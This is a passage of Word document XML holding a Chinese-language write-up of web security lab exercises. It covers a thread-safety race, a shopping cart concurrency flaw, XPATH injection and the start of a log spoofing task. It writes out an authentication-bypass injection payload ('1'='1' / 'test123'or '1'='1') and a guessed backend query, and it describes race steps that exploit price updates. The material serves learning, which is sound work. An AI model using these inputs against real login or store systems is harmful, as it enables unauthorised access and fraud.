          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>變數，讀出來的結果卻是對方設定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="SimSun"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，整個錯亂</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，但其實這個錯誤都是因為</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Thread Safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>issue</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>」</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150EAA5" w14:textId="77777777" w:rsidR="00D87468" w:rsidRDefault="00D87468" w:rsidP="00667043">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18467F4E" w14:textId="60889473" w:rsidR="00D87468" w:rsidRDefault="00D87468" w:rsidP="00667043">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>總之就是在多人連線時，若同時對同一個</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>static variable</w:t>
      </w:r>
      <w:r w:rsidR="001077DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>進行操作，則可能會產生</w:t>
      </w:r>
      <w:r w:rsidR="001077DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>thread safety problem</w:t>
      </w:r>
      <w:r w:rsidR="001077DE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619D7046" w14:textId="77777777" w:rsidR="00A74AB9" w:rsidRDefault="00A74AB9" w:rsidP="00667043">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE928AF" w14:textId="1D34D188" w:rsidR="00A74AB9" w:rsidRPr="00667043" w:rsidRDefault="00A74AB9" w:rsidP="006670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cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>所以我必須要製造「多人連線」的情況誘發</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>thread safety problem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>產生</w:t>
      </w:r>
      <w:r w:rsidR="003D6E99">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，於是我開啟兩個分頁</w:t>
      </w:r>
      <w:r w:rsidR="00067737">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="000819AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">並且分別輸入 </w:t>
      </w:r>
      <w:r w:rsidR="000819AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">jeff </w:t>
      </w:r>
      <w:r w:rsidR="000819AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">和 </w:t>
      </w:r>
      <w:r w:rsidR="000819AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dave</w:t>
      </w:r>
      <w:r w:rsidR="0088743E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>並且快速</w:t>
      </w:r>
      <w:r w:rsidR="0088743E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
      <w:r w:rsidR="0088743E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00950C40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>試了幾次以後成功使兩個分頁都印出</w:t>
      </w:r>
      <w:r w:rsidR="00950C40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>jeff</w:t>
      </w:r>
      <w:r w:rsidR="00950C40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的資料</w:t>
      </w:r>
      <w:r w:rsidR="00221051">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE504B5" w14:textId="77777777" w:rsidR="00667043" w:rsidRPr="00667043" w:rsidRDefault="00667043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78E0AEFC" w14:textId="1EFB1D0E" w:rsidR="00D970B1" w:rsidRDefault="00D970B1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296527E" wp14:editId="43BA9B35">
            <wp:extent cx="5270500" cy="2195830"/>
            <wp:effectExtent l="0" t="0" r="1270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8-03-29 上午11.19.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F9EB" w14:textId="77777777" w:rsidR="001B0C61" w:rsidRDefault="001B0C61" w:rsidP="00F53E30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</w:p>
    <w:p w14:paraId="315F6D39" w14:textId="3B54486F" w:rsidR="001B0C61" w:rsidRDefault="00410DE8" w:rsidP="00B81944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Shopping Cart Concurrency Flaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1528DE02" w14:textId="2BC14C21" w:rsidR="006F2084" w:rsidRDefault="006F2084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3F36FA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485FCFF3" w14:textId="4E23D429" w:rsidR="003F36FA" w:rsidRDefault="003F36FA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4F8F17A3" wp14:editId="2CF9E622">
            <wp:extent cx="5270500" cy="3774440"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1016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8-03-29 上午11.38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7F4" w14:textId="7DEC56F4" w:rsidR="003F36FA" w:rsidRDefault="003F36FA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6ED0C879" w14:textId="1859D024" w:rsidR="003F36FA" w:rsidRDefault="001B647C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直覺思考是像是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thread safety problem</w:t>
      </w:r>
      <w:r w:rsidR="00C428F6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一樣，猜想</w:t>
      </w:r>
      <w:r w:rsidR="00C428F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>subtotal</w:t>
      </w:r>
      <w:r w:rsidR="00CA1715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是全域變數，透過</w:t>
      </w:r>
      <w:r w:rsidR="00840E85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兩個分頁</w:t>
      </w:r>
      <w:r w:rsidR="00CA1715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同時對全域變數進行讀取，產生</w:t>
      </w:r>
      <w:r w:rsidR="00CA1715">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>thread safety problem</w:t>
      </w:r>
      <w:r w:rsidR="00CA1715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使得</w:t>
      </w:r>
      <w:r w:rsidR="0016241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>subtotal</w:t>
      </w:r>
      <w:r w:rsidR="0016241A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降低。</w:t>
      </w:r>
      <w:r w:rsidR="0072654C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但經過幾次嘗試後一直失敗，我想這應該不是解答。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F15CBEB" w14:textId="77777777" w:rsidR="00840E85" w:rsidRDefault="00840E85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</w:p>
    <w:p w14:paraId="723CCF15" w14:textId="0430EC0A" w:rsidR="00840E85" w:rsidRDefault="00A81060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於是我開啟</w:t>
      </w:r>
      <w:r w:rsidR="00840E85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兩個分頁</w:t>
      </w:r>
      <w:r w:rsidR="00E83B1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，分頁</w:t>
      </w:r>
      <w:r w:rsidR="00E83B1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00E83B1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輸入</w:t>
      </w:r>
      <w:r w:rsidR="00E83B1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hitachi 1</w:t>
      </w:r>
      <w:r w:rsidR="00E83B1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個並且按下</w:t>
      </w:r>
      <w:r w:rsidR="00E83B1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>purchase</w:t>
      </w:r>
      <w:r w:rsidR="00E83B1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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D236F13" w14:textId="1942DE6E" w:rsidR="009B347F" w:rsidRDefault="009B347F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355BE59F" wp14:editId="7983D370">
            <wp:extent cx="2789319" cy="2121227"/>
            <wp:effectExtent l="0" t="0" r="5080" b="127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8-03-29 上午11.45.2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530" cy="21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E64" w14:textId="134C1075" w:rsidR="009B347F" w:rsidRPr="001B647C" w:rsidRDefault="009B347F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接著在分頁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B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輸入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Hitachi 10000</w:t>
      </w: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個</w:t>
      </w:r>
      <w:r w:rsidR="00964B1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並且按下</w:t>
      </w:r>
      <w:r w:rsidR="00964B1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>purchase</w:t>
      </w:r>
      <w:r w:rsidR="009978A9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並且按下</w:t>
      </w:r>
      <w:r w:rsidR="009978A9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Update Cart</w:t>
      </w:r>
      <w:r w:rsidR="00E30B62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（猜測</w:t>
      </w:r>
      <w:r w:rsidR="00E30B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>quantity</w:t>
      </w:r>
      <w:r w:rsidR="00E30B62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和</w:t>
      </w:r>
      <w:r w:rsidR="00E30B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>subtotal</w:t>
      </w:r>
      <w:r w:rsidR="00E30B62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為全域變數）</w:t>
      </w:r>
      <w:r w:rsidR="00587D5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，然後在分頁</w:t>
      </w:r>
      <w:r w:rsidR="00587D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00587D5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按下</w:t>
      </w:r>
      <w:r w:rsidR="00587D5E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>confirm</w:t>
      </w:r>
      <w:r w:rsidR="0077388E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。</w:t>
      </w:r>
      <w:r w:rsidR="00AE1B09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結果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42019A9C" w14:textId="414C3E94" w:rsidR="001B647C" w:rsidRDefault="001B647C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50992A0" wp14:editId="7A12A4F6">
            <wp:extent cx="5270500" cy="4392295"/>
            <wp:effectExtent l="0" t="0" r="1270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03-29 上午11.38.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E17" w14:textId="77777777" w:rsidR="00BE1704" w:rsidRDefault="00BE1704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</w:p>
    <w:p w14:paraId="71473FA5" w14:textId="77777777" w:rsidR="00BE1704" w:rsidRDefault="00BE1704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</w:p>
    <w:p w14:paraId="55618E3B" w14:textId="77777777" w:rsidR="00BE1704" w:rsidRDefault="00BE1704" w:rsidP="006F2084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</w:p>
    <w:p w14:paraId="0220EA04" w14:textId="3BAA54B8" w:rsidR="00402812" w:rsidRDefault="00852728" w:rsidP="0049256F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XPATH Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB3BBF7" w14:textId="43BE566C" w:rsidR="0049256F" w:rsidRDefault="0049256F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402812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54739E34" w14:textId="567DA0FE" w:rsidR="000449ED" w:rsidRDefault="00506BF5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2C961727" wp14:editId="70569D94">
            <wp:extent cx="5270500" cy="2739390"/>
            <wp:effectExtent l="0" t="0" r="1270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快照 2018-03-29 下午5.44.5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333E" w14:textId="74B98443" w:rsidR="00732B5D" w:rsidRDefault="00732B5D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A81AB0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07EA8436" w14:textId="27694EA1" w:rsidR="003E15D0" w:rsidRPr="00342CFC" w:rsidRDefault="00AB4B79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User Name : </w:t>
      </w:r>
      <w:r w:rsidR="00AF7CC7" w:rsidRPr="00342CFC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EBDF40" w14:textId="0DFA2B77" w:rsidR="00342CFC" w:rsidRDefault="00AB4B79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Password : </w:t>
      </w:r>
      <w:r w:rsidR="00342CFC" w:rsidRPr="00342CFC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test123’or </w:t>
      </w:r>
      <w:r w:rsidR="00342CFC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‘</w:t>
      </w:r>
      <w:r w:rsidR="00342CFC" w:rsidRPr="00342CFC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1’=</w:t>
      </w:r>
      <w:r w:rsidR="00342CFC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‘</w:t>
      </w:r>
      <w:r w:rsidR="00342CFC" w:rsidRPr="00342CFC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13172D55" w14:textId="35332290" w:rsidR="00575AAF" w:rsidRDefault="00631763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猜測結果</w:t>
      </w:r>
      <w:r w:rsidR="00D96224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後端應該為</w:t>
      </w:r>
      <w:r w:rsidR="00575AAF"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類似：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAA958F" w14:textId="2933D7EB" w:rsidR="00575AAF" w:rsidRDefault="00575AAF" w:rsidP="00575AAF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SELECT * FROM USER_TABLE WHERE UserName =</w:t>
      </w:r>
      <w:r w:rsidRPr="00575AAF"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‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00575AAF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1'='1</w:t>
      </w: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 xml:space="preserve">’AND </w:t>
      </w:r>
      <w:r w:rsidR="006F0590">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Password = ‘</w:t>
      </w:r>
      <w:r w:rsidR="006F0590" w:rsidRPr="006F0590">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">test123’or </w:t>
      </w:r>
      <w:r w:rsidR="006F0590" w:rsidRPr="006F0590">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="006F0590" w:rsidRPr="006F0590">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1’=</w:t>
      </w:r>
      <w:r w:rsidR="006F0590" w:rsidRPr="006F0590">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="006F0590" w:rsidRPr="006F0590">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006F0590">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635A5248" w14:textId="27E3F020" w:rsidR="003E15D0" w:rsidRPr="001C646A" w:rsidRDefault="008F2F3D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</w:rPr>
        <w:t>結果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1392DD" w14:textId="6BDFAF4B" w:rsidR="003E15D0" w:rsidRDefault="003E15D0" w:rsidP="00402812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F54BD57" wp14:editId="17D237FC">
            <wp:extent cx="5095455" cy="3668114"/>
            <wp:effectExtent l="0" t="0" r="1016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03-29 下午12.03.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4" cy="36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ACAB" w14:textId="12DAD25E" w:rsidR="00A970A7" w:rsidRDefault="00A85A0E" w:rsidP="00A970A7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t>Log Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FCF672" w14:textId="440B8DF5" w:rsidR="003E64CD" w:rsidRPr="007A5B35" w:rsidRDefault="003E64CD" w:rsidP="003E64CD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7A5B35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題目截圖：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787512F8" w14:textId="16641ADC" w:rsidR="00883E4B" w:rsidRDefault="00012EDD" w:rsidP="00883E4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19672E42" wp14:editId="1D74A2FF">
            <wp:extent cx="5270500" cy="2127885"/>
            <wp:effectExtent l="0" t="0" r="1270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03-29 下午5.47.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1BD" w14:textId="2BF36A41" w:rsidR="00FE685A" w:rsidRDefault="00FE685A" w:rsidP="00883E4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE685A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>解題流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2212A8A1" w14:textId="77777777" w:rsidR="006F0DAF" w:rsidRDefault="00FC225A" w:rsidP="00FC225A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC225A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>題目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">寫說要 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>make it like a username</w:t>
      </w:r>
      <w:r w:rsidR="003E0A67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> “admin”</w:t>
      </w:r>
      <w:r w:rsidR="00544D01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>has succeeded into logging in.</w:t>
      </w:r>
      <w:r w:rsidR="002D7E7D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
